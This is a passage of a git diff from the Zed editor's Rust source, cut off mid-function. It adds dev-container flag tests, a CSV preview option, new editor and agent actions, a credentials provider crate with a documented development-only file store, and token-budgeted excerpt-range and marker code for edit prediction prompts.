open_in_dev_container: true, + ..Default::default() + }, + &response_tx, + &app_state, + &mut cx, + ) + .await + } + }) + .await; + + assert!(!errored); + + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + let flag = multi_workspace.workspace().read(cx).open_in_dev_container(); + assert!( + !flag, + "open_in_dev_container flag should be consumed by suggest_on_worktree_updated" + ); + }) + .unwrap(); + } + + #[gpui::test] + async fn test_dev_container_flag_cleared_without_config(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(|cx| recent_projects::init(cx)); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + let (response_tx, _) = ipc::channel::().unwrap(); + let errored = cx + .spawn({ + let app_state = app_state.clone(); + |mut cx| async move { + open_local_workspace( + vec![path!("/project").to_owned()], + vec![], + false, + workspace::OpenOptions { + open_in_dev_container: true, + ..Default::default() + }, + &response_tx, + &app_state, + &mut cx, + ) + .await + } + }) + .await; + + assert!(!errored); + + // Let any pending worktree scan events and updates settle. + cx.run_until_parked(); + + // With no .devcontainer config, the flag should be cleared once the + // worktree scan completes, rather than persisting on the workspace. + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + let flag = multi_workspace + .workspace() + .read(cx) + .open_in_dev_container(); + assert!( + !flag, + "open_in_dev_container flag should be cleared when no devcontainer config exists" + ); + }) + .unwrap(); + } } diff --git a/crates/zed/src/zed/quick_action_bar/preview.rs b/crates/zed/src/zed/quick_action_bar/preview.rs index 5d43e79542357977b06fbbd884472f94ad3595c8..01e2d164d7d7a8a81e64ab77ad646111e4baacd7 100644 --- a/crates/zed/src/zed/quick_action_bar/preview.rs +++ b/crates/zed/src/zed/quick_action_bar/preview.rs @@ -1,3 +1,8 @@ +use csv_preview::{ + CsvPreviewView, OpenPreview as CsvOpenPreview, OpenPreviewToTheSide as CsvOpenPreviewToTheSide, + TabularDataPreviewFeatureFlag, +}; +use feature_flags::FeatureFlagAppExt as _; use gpui::{AnyElement, Modifiers, WeakEntity}; use markdown_preview::{ OpenPreview as MarkdownOpenPreview, OpenPreviewToTheSide as MarkdownOpenPreviewToTheSide, @@ -16,6 +21,7 @@ use super::QuickActionBar; enum PreviewType { Markdown, Svg, + Csv, } impl QuickActionBar { @@ -35,6 +41,10 @@ impl QuickActionBar { } else if SvgPreviewView::resolve_active_item_as_svg_buffer(workspace, cx).is_some() { preview_type = Some(PreviewType::Svg); + } else if cx.has_flag::() + && CsvPreviewView::resolve_active_item_as_csv_editor(workspace, cx).is_some() + { + preview_type = Some(PreviewType::Csv); } }); } @@ -57,6 +67,13 @@ impl QuickActionBar { Box::new(SvgOpenPreviewToTheSide) as Box, &svg_preview::OpenPreview as &dyn gpui::Action, ), + PreviewType::Csv => ( + "toggle-csv-preview", + "Preview CSV", + Box::new(CsvOpenPreview) as Box, + Box::new(CsvOpenPreviewToTheSide) as Box, + &csv_preview::OpenPreview as &dyn gpui::Action, + ), }; let alt_click = gpui::Keystroke { diff --git a/crates/zed/src/zed/telemetry_log.rs b/crates/zed/src/zed/telemetry_log.rs index 06e13ef5d86fb665151b13ce01de5a60def9ba15..7df7e83d25804edb1a7a73abf055d9adaf080a90 100644 --- a/crates/zed/src/zed/telemetry_log.rs +++ b/crates/zed/src/zed/telemetry_log.rs @@ -12,11 +12,11 @@ use gpui::{ StyleRefinement, Task, TextStyleRefinement, Window, list, prelude::*, }; use language::LanguageRegistry; -use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; +use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use project::Project; use settings::Settings; use telemetry_events::{Event, EventWrapper}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Icon, IconButton, IconName, IconSize, Label, TextSize, Tooltip, WithScrollbar, prelude::*, }; @@ -424,8 +424,11 @@ impl TelemetryLogView { }, ) .code_block_renderer(CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: expanded, + copy_button_visibility: if expanded { + CopyButtonVisibility::VisibleOnHover + } else { + CopyButtonVisibility::Hidden + }, border: false, }), ), diff --git a/crates/zed/src/zed/visual_tests.rs b/crates/zed/src/zed/visual_tests.rs index 0aab800eaf0e8664a875751d0b1df1abce98c945..982db08782207a9bfef96ec8f17c28c8abac41f3 100644 --- a/crates/zed/src/zed/visual_tests.rs +++ b/crates/zed/src/zed/visual_tests.rs @@ -51,7 +51,7 @@ pub fn init_visual_test(cx: &mut VisualTestAppContext) -> Arc { let app_state = AppState::test(cx); gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); audio::init(cx); workspace::init(app_state.clone(), cx); release_channel::init(semver::Version::new(0, 0, 0), cx); diff --git a/crates/zed/src/zed/windows_only_instance.rs b/crates/zed/src/zed/windows_only_instance.rs index 5790715bc13bdcc68d180519d9176873bd81bc50..f22f49e26a982cb8cb68e21645033819e059de36 100644 --- a/crates/zed/src/zed/windows_only_instance.rs +++ b/crates/zed/src/zed/windows_only_instance.rs @@ -162,6 +162,7 @@ fn send_args_to_instance(args: &Args) -> anyhow::Result<()> { reuse: false, env: None, user_data_dir: args.user_data_dir.clone(), + dev_container: args.dev_container, } }; diff --git a/crates/zed_actions/src/lib.rs b/crates/zed_actions/src/lib.rs index ae785bb4a0c792dd7f55d8850e8c05ce6327c108..66ccf9c41c1e1cfcb821e03b4e9b7d4803f53c0b 100644 --- a/crates/zed_actions/src/lib.rs +++ b/crates/zed_actions/src/lib.rs @@ -85,8 +85,6 @@ pub enum ExtensionCategoryFilter { LanguageServers, ContextServers, AgentServers, - SlashCommands, - IndexedDocsProviders, Snippets, DebugAdapters, } @@ -110,6 +108,12 @@ pub struct Extensions { #[serde(deny_unknown_fields)] pub struct AcpRegistry; +/// Show call diagnostics and connection quality statistics. +#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = collab)] +#[serde(deny_unknown_fields)] +pub struct ShowCallStats; + /// Decreases the font size in the editor buffer. #[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] #[action(namespace = zed)] @@ -191,6 +195,8 @@ pub mod editor { MoveUp, /// Moves cursor down. MoveDown, + /// Reveals the current file in the system file manager. + RevealInFileManager, ] ); } @@ -325,6 +331,12 @@ pub mod feedback { ); } +pub mod theme { + use gpui::actions; + + actions!(theme, [ToggleMode]); +} + pub mod theme_selector { use gpui::Action; use schemars::JsonSchema; @@ -438,8 +450,6 @@ pub mod agent { OpenOnboardingModal, /// Opens the ACP onboarding modal. OpenAcpOnboardingModal, - /// Opens the Claude Agent onboarding modal. - OpenClaudeAgentOnboardingModal, /// Resets the agent onboarding state. ResetOnboarding, /// Starts a chat conversation with the agent. @@ -469,6 +479,33 @@ pub mod agent { /// The base ref that the diff was computed against (e.g. "main"). pub base_ref: SharedString, } + + /// A single merge conflict region extracted from a file. + #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema)] + pub struct ConflictContent { + pub file_path: String, + pub conflict_text: String, + pub ours_branch_name: String, + pub theirs_branch_name: String, + } + + /// Opens a new agent thread to resolve specific merge conflicts. + #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] + #[action(namespace = agent)] + #[serde(deny_unknown_fields)] + pub struct ResolveConflictsWithAgent { + /// Individual conflicts with their full text. + pub conflicts: Vec, + } + + /// Opens a new agent thread to resolve merge conflicts in the given file paths. + #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] + #[action(namespace = agent)] + #[serde(deny_unknown_fields)] + pub struct ResolveConflictedFilesWithAgent { + /// File paths with unresolved conflicts (for project-wide resolution). + pub conflicted_file_paths: Vec, + } } pub mod assistant { @@ -487,14 +524,6 @@ pub mod assistant { ] ); - actions!( - assistant, - [ - /// Shows the assistant configuration panel. - ShowConfiguration - ] - ); - /// Opens the rules library for managing agent rules and prompts. #[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] #[action(namespace = agent, deprecated_aliases = ["assistant::OpenRulesLibrary", "assistant::DeployPromptLibrary"])] @@ -737,6 +766,31 @@ pub mod preview { } } +pub mod agents_sidebar { + use gpui::{Action, actions}; + use schemars::JsonSchema; + use serde::Deserialize; + + /// Toggles the thread switcher popup when the sidebar is focused. + #[derive(PartialEq, Clone, Deserialize, JsonSchema, Default, Action)] + #[action(namespace = agents_sidebar)] + #[serde(deny_unknown_fields)] + pub struct ToggleThreadSwitcher { + #[serde(default)] + pub select_last: bool, + } + + actions!( + agents_sidebar, + [ + /// Moves focus to the sidebar's search/filter editor. + FocusSidebarFilter, + /// Moves the active workspace to a new window. + MoveWorkspaceToNewWindow, + ] + ); +} + pub mod notebook { use gpui::actions; diff --git a/crates/supermaven_api/Cargo.toml b/crates/zed_credentials_provider/Cargo.toml similarity index 62% rename from crates/supermaven_api/Cargo.toml rename to crates/zed_credentials_provider/Cargo.toml index 28868a9a7433f995e99b861cf7f6e9aeeb28942f..9f64801d4664111bceb0fb7b9ee8c007977b6389 100644 --- a/crates/supermaven_api/Cargo.toml +++ b/crates/zed_credentials_provider/Cargo.toml @@ -1,5 +1,5 @@ [package] -name = "supermaven_api" +name = "zed_credentials_provider" version = "0.1.0" edition.workspace = true publish.workspace = true @@ -9,15 +9,14 @@ license = "GPL-3.0-or-later" workspace = true [lib] -path = "src/supermaven_api.rs" -doctest = false +path = "src/zed_credentials_provider.rs" [dependencies] anyhow.workspace = true +credentials_provider.workspace = true futures.workspace = true -http_client.workspace = true +gpui.workspace = true paths.workspace = true +release_channel.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true -util.workspace = true diff --git a/crates/zed_credentials_provider/LICENSE-GPL b/crates/zed_credentials_provider/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/crates/zed_credentials_provider/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/zed_credentials_provider/src/zed_credentials_provider.rs b/crates/zed_credentials_provider/src/zed_credentials_provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..6705e58d400b1a66990f2451d318b5950ea08dde --- /dev/null +++ b/crates/zed_credentials_provider/src/zed_credentials_provider.rs @@ -0,0 +1,181 @@ +use std::collections::HashMap; +use std::future::Future; +use std::path::PathBuf; +use std::pin::Pin; +use std::sync::{Arc, LazyLock}; + +use anyhow::Result; +use credentials_provider::CredentialsProvider; +use futures::FutureExt as _; +use gpui::{App, AsyncApp, Global}; +use release_channel::ReleaseChannel; + +/// An environment variable whose presence indicates that the system keychain +/// should be used in development. +/// +/// By default, running Zed in development uses the development credentials +/// provider. Setting this environment variable allows you to interact with the +/// system keychain (for instance, if you need to test something). +/// +/// Only works in development. Setting this environment variable in other +/// release channels is a no-op. +static ZED_DEVELOPMENT_USE_KEYCHAIN: LazyLock = LazyLock::new(|| { + std::env::var("ZED_DEVELOPMENT_USE_KEYCHAIN").is_ok_and(|value| !value.is_empty()) +}); + +pub struct ZedCredentialsProvider(pub Arc); + +impl Global for ZedCredentialsProvider {} + +/// Returns the global [`CredentialsProvider`]. +pub fn init_global(cx: &mut App) { + // The `CredentialsProvider` trait has `Send + Sync` bounds on it, so it + // seems like this is a false positive from Clippy. + #[allow(clippy::arc_with_non_send_sync)] + let provider = new(cx); + cx.set_global(ZedCredentialsProvider(provider)); +} + +pub fn global(cx: &App) -> Arc { + cx.try_global::() + .map(|provider| provider.0.clone()) + .unwrap_or_else(|| new(cx)) +} + +fn new(cx: &App) -> Arc { + let use_development_provider = match ReleaseChannel::try_global(cx) { + Some(ReleaseChannel::Dev) => { + // In development we default to using the development + // credentials provider to avoid getting spammed by relentless + // keychain access prompts. + // + // However, if the `ZED_DEVELOPMENT_USE_KEYCHAIN` environment + // variable is set, we will use the actual keychain. + !*ZED_DEVELOPMENT_USE_KEYCHAIN + } + Some(ReleaseChannel::Nightly | ReleaseChannel::Preview | ReleaseChannel::Stable) | None => { + false + } + }; + + if use_development_provider { + Arc::new(DevelopmentCredentialsProvider::new()) + } else { + Arc::new(KeychainCredentialsProvider) + } +} + +/// A credentials provider that stores credentials in the system keychain. +struct KeychainCredentialsProvider; + +impl CredentialsProvider for KeychainCredentialsProvider { + fn read_credentials<'a>( + &'a self, + url: &'a str, + cx: &'a AsyncApp, + ) -> Pin)>>> + 'a>> { + async move { cx.update(|cx| cx.read_credentials(url)).await }.boxed_local() + } + + fn write_credentials<'a>( + &'a self, + url: &'a str, + username: &'a str, + password: &'a [u8], + cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + cx.update(move |cx| cx.write_credentials(url, username, password)) + .await + } + .boxed_local() + } + + fn delete_credentials<'a>( + &'a self, + url: &'a str, + cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { cx.update(move |cx| cx.delete_credentials(url)).await }.boxed_local() + } +} + +/// A credentials provider that stores credentials in a local file. +/// +/// This MUST only be used in development, as this is not a secure way of storing +/// credentials on user machines. +/// +/// Its existence is purely to work around the annoyance of having to constantly +/// re-allow access to the system keychain when developing Zed. +struct DevelopmentCredentialsProvider { + path: PathBuf, +} + +impl DevelopmentCredentialsProvider { + fn new() -> Self { + let path = paths::config_dir().join("development_credentials"); + + Self { path } + } + + fn load_credentials(&self) -> Result)>> { + let json = std::fs::read(&self.path)?; + let credentials: HashMap)> = serde_json::from_slice(&json)?; + + Ok(credentials) + } + + fn save_credentials(&self, credentials: &HashMap)>) -> Result<()> { + let json = serde_json::to_string(credentials)?; + std::fs::write(&self.path, json)?; + + Ok(()) + } +} + +impl CredentialsProvider for DevelopmentCredentialsProvider { + fn read_credentials<'a>( + &'a self, + url: &'a str, + _cx: &'a AsyncApp, + ) -> Pin)>>> + 'a>> { + async move { + Ok(self + .load_credentials() + .unwrap_or_default() + .get(url) + .cloned()) + } + .boxed_local() + } + + fn write_credentials<'a>( + &'a self, + url: &'a str, + username: &'a str, + password: &'a [u8], + _cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + let mut credentials = self.load_credentials().unwrap_or_default(); + credentials.insert(url.to_string(), (username.to_string(), password.to_vec())); + + self.save_credentials(&credentials) + } + .boxed_local() + } + + fn delete_credentials<'a>( + &'a self, + url: &'a str, + _cx: &'a AsyncApp, + ) -> Pin> + 'a>> { + async move { + let mut credentials = self.load_credentials()?; + credentials.remove(url); + + self.save_credentials(&credentials) + } + .boxed_local() + } +} diff --git a/crates/zed_env_vars/Cargo.toml b/crates/zed_env_vars/Cargo.toml index 1cf32174c351c28ec7eb16deab7b7986655d4a48..bf863b742568f3f607ba7cb54bc8fc267f045cc9 100644 --- a/crates/zed_env_vars/Cargo.toml +++ b/crates/zed_env_vars/Cargo.toml @@ -15,4 +15,4 @@ path = "src/zed_env_vars.rs" default = [] [dependencies] -gpui.workspace = true +env_var.workspace = true diff --git a/crates/zed_env_vars/src/zed_env_vars.rs b/crates/zed_env_vars/src/zed_env_vars.rs index e601cc9536602ac943bd76bf1bfd8b8ac8979dd9..13451911295735762074bcb1cf152470afa55c36 100644 --- a/crates/zed_env_vars/src/zed_env_vars.rs +++ b/crates/zed_env_vars/src/zed_env_vars.rs @@ -1,45 +1,6 @@ -use gpui::SharedString; +pub use env_var::{EnvVar, bool_env_var, env_var}; use std::sync::LazyLock; /// Whether Zed is running in stateless mode. /// When true, Zed will use in-memory databases instead of persistent storage. pub static ZED_STATELESS: LazyLock = bool_env_var!("ZED_STATELESS"); - -#[derive(Clone)] -pub struct EnvVar { - pub name: SharedString, - /// Value of the environment variable. Also `None` when set to an empty string. - pub value: Option, -} - -impl EnvVar { - pub fn new(name: SharedString) -> Self { - let value = std::env::var(name.as_str()).ok(); - if value.as_ref().is_some_and(|v| v.is_empty()) { - Self { name, value: None } - } else { - Self { name, value } - } - } - - pub fn or(self, other: EnvVar) -> EnvVar { - if self.value.is_some() { self } else { other } - } -} - -/// Creates a `LazyLock` expression for use in a `static` declaration. -#[macro_export] -macro_rules! env_var { - ($name:expr) => { - ::std::sync::LazyLock::new(|| $crate::EnvVar::new(($name).into())) - }; -} - -/// Generates a `LazyLock` expression for use in a `static` declaration. Checks if the -/// environment variable exists and is non-empty. -#[macro_export] -macro_rules! bool_env_var { - ($name:expr) => { - ::std::sync::LazyLock::new(|| $crate::EnvVar::new(($name).into()).value.is_some()) - }; -} diff --git a/crates/zeta_prompt/Cargo.toml b/crates/zeta_prompt/Cargo.toml index 21634583d33e13cd9570041f3e8466d05cef9944..8acd91a7a43613fd63f4f46ab73e9485fd64e7d2 100644 --- a/crates/zeta_prompt/Cargo.toml +++ b/crates/zeta_prompt/Cargo.toml @@ -13,6 +13,7 @@ path = "src/zeta_prompt.rs" [dependencies] anyhow.workspace = true +imara-diff.workspace = true serde.workspace = true strum.workspace = true diff --git a/crates/zeta_prompt/src/excerpt_ranges.rs b/crates/zeta_prompt/src/excerpt_ranges.rs new file mode 100644 index 0000000000000000000000000000000000000000..40621fe98a13bfa9195293ad29ba549240532a2e --- /dev/null +++ b/crates/zeta_prompt/src/excerpt_ranges.rs @@ -0,0 +1,443 @@ +use std::ops::Range; + +use serde::{Deserialize, Serialize}; + +use crate::estimate_tokens; + +/// Pre-computed byte offset ranges within `cursor_excerpt` for different +/// editable and context token budgets. Allows the server to select the +/// appropriate ranges for whichever model it uses. +#[derive(Clone, Debug, Default, PartialEq, Hash, Serialize, Deserialize)] +pub struct ExcerptRanges { + /// Editable region computed with a 150-token budget. + pub editable_150: Range, + /// Editable region computed with a 180-token budget. + pub editable_180: Range, + /// Editable region computed with a 350-token budget. + pub editable_350: Range, + /// Editable region computed with a 350-token budget. + pub editable_512: Option>, + /// Context boundary when using editable_150 with 350 tokens of additional context. + pub editable_150_context_350: Range, + /// Context boundary when using editable_180 with 350 tokens of additional context. + pub editable_180_context_350: Range, + /// Context boundary when using editable_350 with 150 tokens of additional context. + pub editable_350_context_150: Range, + pub editable_350_context_512: Option>, + pub editable_350_context_1024: Option>, + pub context_4096: Option>, + pub context_8192: Option>, +} + +/// Builds an `ExcerptRanges` by computing editable and context ranges for each +/// budget combination, using the syntax-aware logic in +/// `compute_editable_and_context_ranges`. +pub fn compute_legacy_excerpt_ranges( + cursor_excerpt: &str, + cursor_offset: usize, + syntax_ranges: &[Range], +) -> ExcerptRanges { + let compute = |editable_tokens, context_tokens| { + compute_editable_and_context_ranges( + cursor_excerpt, + cursor_offset, + syntax_ranges, + editable_tokens, + context_tokens, + ) + }; + + let (editable_150, editable_150_context_350) = compute(150, 350); + let (editable_180, editable_180_context_350) = compute(180, 350); + let (editable_350, editable_350_context_150) = compute(350, 150); + let (editable_512, _) = compute(512, 0); + let (_, editable_350_context_512) = compute(350, 512); + let (_, editable_350_context_1024) = compute(350, 1024); + let (_, context_4096) = compute(350, 4096); + let (_, context_8192) = compute(350, 8192); + + ExcerptRanges { + editable_150, + editable_180, + editable_350, + editable_512: Some(editable_512), + editable_150_context_350, + editable_180_context_350, + editable_350_context_150, + editable_350_context_512: Some(editable_350_context_512), + editable_350_context_1024: Some(editable_350_context_1024), + context_4096: Some(context_4096), + context_8192: Some(context_8192), + } +} + +/// Given the cursor excerpt text, cursor offset, and the syntax node ranges +/// containing the cursor (innermost to outermost), compute the editable range +/// and context range as byte offset ranges within `cursor_excerpt`. +/// +/// This is the server-side equivalent of `compute_excerpt_ranges` in +/// `edit_prediction::cursor_excerpt`, but operates on plain text with +/// pre-computed syntax boundaries instead of a `BufferSnapshot`. +pub fn compute_editable_and_context_ranges( + cursor_excerpt: &str, + cursor_offset: usize, + syntax_ranges: &[Range], + editable_token_limit: usize, + context_token_limit: usize, +) -> (Range, Range) { + let line_starts = compute_line_starts(cursor_excerpt); + let cursor_row = offset_to_row(&line_starts, cursor_offset); + let max_row = line_starts.len().saturating_sub(1) as u32; + + let editable_range = compute_editable_range_from_text( + cursor_excerpt, + &line_starts, + cursor_row, + max_row, + syntax_ranges, + editable_token_limit, + ); + + let context_range = expand_context_from_text( + cursor_excerpt, + &line_starts, + max_row, + &editable_range, + syntax_ranges, + context_token_limit, + ); + + (editable_range, context_range) +} + +fn compute_line_starts(text: &str) -> Vec { + let mut starts = vec![0]; + for (index, byte) in text.bytes().enumerate() { + if byte == b'\n' { + starts.push(index + 1); + } + } + starts +} + +fn offset_to_row(line_starts: &[usize], offset: usize) -> u32 { + match line_starts.binary_search(&offset) { + Ok(row) => row as u32, + Err(row) => (row.saturating_sub(1)) as u32, + } +} + +fn row_start_offset(line_starts: &[usize], row: u32) -> usize { + line_starts.get(row as usize).copied().unwrap_or(0) +} + +fn row_end_offset(text: &str, line_starts: &[usize], row: u32) -> usize { + if let Some(&next_start) = line_starts.get(row as usize + 1) { + // End before the newline of this row. + next_start.saturating_sub(1).min(text.len()) + } else { + text.len() + } +} + +fn row_range_to_byte_range( + text: &str, + line_starts: &[usize], + start_row: u32, + end_row: u32, +) -> Range { + let start = row_start_offset(line_starts, start_row); + let end = row_end_offset(text, line_starts, end_row); + start..end +} + +fn estimate_tokens_for_row_range( + text: &str, + line_starts: &[usize], + start_row: u32, + end_row: u32, +) -> usize { + let mut tokens = 0; + for row in start_row..end_row { + let row_len = row_end_offset(text, line_starts, row) + .saturating_sub(row_start_offset(line_starts, row)); + tokens += estimate_tokens(row_len).max(1); + } + tokens +} + +fn line_token_count_from_text(text: &str, line_starts: &[usize], row: u32) -> usize { + let row_len = + row_end_offset(text, line_starts, row).saturating_sub(row_start_offset(line_starts, row)); + estimate_tokens(row_len).max(1) +} + +/// Returns syntax boundaries (as row ranges) that contain the given row range +/// and extend beyond it, ordered from smallest to largest. +fn containing_syntax_boundaries_from_ranges( + line_starts: &[usize], + syntax_ranges: &[Range], + start_row: u32, + end_row: u32, +) -> Vec<(u32, u32)> { + let mut boundaries = Vec::new(); + let mut last: Option<(u32, u32)> = None; + + // syntax_ranges is innermost to outermost, so iterate in order. + for range in syntax_ranges { + let node_start_row = offset_to_row(line_starts, range.start); + let node_end_row = offset_to_row(line_starts, range.end); + + // Skip nodes that don't extend beyond the current range. + if node_start_row >= start_row && node_end_row <= end_row { + continue; + } + + let rows = (node_start_row, node_end_row); + if last == Some(rows) { + continue; + } + + last = Some(rows); + boundaries.push(rows); + } + + boundaries +} + +fn compute_editable_range_from_text( + text: &str, + line_starts: &[usize], + cursor_row: u32, + max_row: u32, + syntax_ranges: &[Range], + token_limit: usize, +) -> Range { + // Phase 1: Expand symmetrically from cursor using 75% of budget. + let initial_budget = (token_limit * 3) / 4; + let (mut start_row, mut end_row, mut remaining_tokens) = + expand_symmetric(text, line_starts, cursor_row, max_row, initial_budget); + + remaining_tokens += token_limit.saturating_sub(initial_budget); + + let original_start = start_row; + let original_end = end_row; + + // Phase 2: Expand to syntax boundaries that fit within budget. + let boundaries = + containing_syntax_boundaries_from_ranges(line_starts, syntax_ranges, start_row, end_row); + for (boundary_start, boundary_end) in &boundaries { + let tokens_for_start = if *boundary_start < start_row { + estimate_tokens_for_row_range(text, line_starts, *boundary_start, start_row) + } else { + 0 + }; + let tokens_for_end = if *boundary_end > end_row { + estimate_tokens_for_row_range(text, line_starts, end_row + 1, *boundary_end + 1) + } else { + 0 + }; + + let total_needed = tokens_for_start + tokens_for_end; + if total_needed <= remaining_tokens { + if *boundary_start < start_row { + start_row = *boundary_start; + } + if *boundary_end > end_row { + end_row = *boundary_end; + } + remaining_tokens = remaining_tokens.saturating_sub(total_needed); + } else { + break; + } + } + + // Phase 3: Continue line-wise in the direction we expanded least. + let expanded_up = original_start.saturating_sub(start_row); + let expanded_down = end_row.saturating_sub(original_end); + let prefer_up = expanded_up <= expanded_down; + + (start_row, end_row, _) = expand_linewise( + text, + line_starts, + start_row, + end_row, + max_row, + remaining_tokens, + prefer_up, + ); + + row_range_to_byte_range(text, line_starts, start_row, end_row) +} + +fn expand_context_from_text( + text: &str, + line_starts: &[usize], + max_row: u32, + editable_range: &Range, + syntax_ranges: &[Range], + context_token_limit: usize, +) -> Range { + let mut start_row = offset_to_row(line_starts, editable_range.start); + let mut end_row = offset_to_row(line_starts, editable_range.end); + let mut remaining_tokens = context_token_limit; + let mut did_syntax_expand = false; + + let boundaries = + containing_syntax_boundaries_from_ranges(line_starts, syntax_ranges, start_row, end_row); + for (boundary_start, boundary_end) in &boundaries { + let tokens_for_start = if *boundary_start < start_row { + estimate_tokens_for_row_range(text, line_starts, *boundary_start, start_row) + } else { + 0 + }; + let tokens_for_end = if *boundary_end > end_row { + estimate_tokens_for_row_range(text, line_starts, end_row + 1, *boundary_end + 1) + } else { + 0 + }; + + let total_needed = tokens_for_start + tokens_for_end; + if total_needed <= remaining_tokens { + if *boundary_start < start_row { + start_row = *boundary_start; + } + if *boundary_end > end_row { + end_row = *boundary_end; + } + remaining_tokens = remaining_tokens.saturating_sub(total_needed); + did_syntax_expand = true; + } else { + break; + } + } + + // Only expand line-wise if no syntax expansion occurred. + if !did_syntax_expand { + (start_row, end_row, _) = expand_linewise( + text, + line_starts, + start_row, + end_row, + max_row, + remaining_tokens, + true, + ); + } + + row_range_to_byte_range(text, line_starts, start_row, end_row) +} + +fn expand_symmetric( + text: &str, + line_starts: &[usize], + cursor_row: u32, + max_row: u32, + mut token_budget: usize, +) -> (u32, u32, usize) { + let mut start_row = cursor_row; + let mut end_row = cursor_row; + + let cursor_line_tokens = line_token_count_from_text(text, line_starts, cursor_row); + token_budget = token_budget.saturating_sub(cursor_line_tokens); + + loop { + let can_expand_up = start_row > 0; + let can_expand_down = end_row < max_row; + + if token_budget == 0 || (!can_expand_up && !can_expand_down) { + break; + } + + if can_expand_down { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= token_budget { + end_row = next_row; + token_budget = token_budget.saturating_sub(line_tokens); + } else { + break; + } + } + + if can_expand_up && token_budget > 0 { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= token_budget { + start_row = next_row; + token_budget = token_budget.saturating_sub(line_tokens); + } else { + break; + } + } + } + + (start_row, end_row, token_budget) +} + +fn expand_linewise( + text: &str, + line_starts: &[usize], + mut start_row: u32, + mut end_row: u32, + max_row: u32, + mut remaining_tokens: usize, + prefer_up: bool, +) -> (u32, u32, usize) { + loop { + let can_expand_up = start_row > 0; + let can_expand_down = end_row < max_row; + + if remaining_tokens == 0 || (!can_expand_up && !can_expand_down) { + break; + } + + let mut expanded = false; + + if prefer_up { + if can_expand_up { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + start_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + if can_expand_down && remaining_tokens > 0 { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + end_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + } else { + if can_expand_down { + let next_row = end_row + 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + end_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + if can_expand_up && remaining_tokens > 0 { + let next_row = start_row - 1; + let line_tokens = line_token_count_from_text(text, line_starts, next_row); + if line_tokens <= remaining_tokens { + start_row = next_row; + remaining_tokens = remaining_tokens.saturating_sub(line_tokens); + expanded = true; + } + } + } + + if !expanded { + break; + } + } + + (start_row, end_row, remaining_tokens) +} diff --git a/crates/zeta_prompt/src/multi_region.rs b/crates/zeta_prompt/src/multi_region.rs new file mode 100644 index 0000000000000000000000000000000000000000..a2e50ca445998672a169f4220d13eb4c13a22e8b --- /dev/null +++ b/crates/zeta_prompt/src/multi_region.rs @@ -0,0 +1,1691 @@ +use anyhow::{Context as _, Result, anyhow}; + +pub const MARKER_TAG_PREFIX: &str = "<|marker_"; +pub const MARKER_TAG_SUFFIX: &str = "|>"; +pub const RELATIVE_MARKER_TAG_PREFIX: &str = "<|marker"; +const V0316_MIN_BLOCK_LINES: usize = 3; +const V0316_MAX_BLOCK_LINES: usize = 8; +const V0318_MIN_BLOCK_LINES: usize = 6; +const V0318_MAX_BLOCK_LINES: usize = 16; +const MAX_NUDGE_LINES: usize = 5; +pub const V0316_END_MARKER: &str = "<[end▁of▁sentence]>"; +pub const V0317_END_MARKER: &str = "<[end▁of▁sentence]>"; +pub const V0318_END_MARKER: &str = "<[end▁of▁sentence]>"; + +pub fn marker_tag(number: usize) -> String { + format!("{MARKER_TAG_PREFIX}{number}{MARKER_TAG_SUFFIX}") +} + +pub fn marker_tag_relative(delta: isize) -> String { + if delta > 0 { + format!("<|marker+{delta}|>") + } else if delta == 0 { + String::from("<|marker-0|>") + } else { + format!("<|marker{delta}|>") + } +} + +struct LineInfo { + start: usize, + is_blank: bool, + is_good_start: bool, +} + +fn collect_line_info(text: &str) -> Vec { + let mut lines = Vec::new(); + let mut offset = 0; + for line in text.split('\n') { + let trimmed = line.trim(); + let is_blank = trimmed.is_empty(); + let is_good_start = !is_blank && !is_structural_tail(trimmed); + lines.push(LineInfo { + start: offset, + is_blank, + is_good_start, + }); + offset += line.len() + 1; + } + // split('\n') on "abc\n" yields ["abc", ""] — drop the phantom trailing + // empty element when the text ends with '\n'. + if text.ends_with('\n') && lines.len() > 1 { + lines.pop(); + } + lines +} + +fn is_structural_tail(trimmed_line: &str) -> bool { + if trimmed_line.starts_with(&['}', ']', ')']) 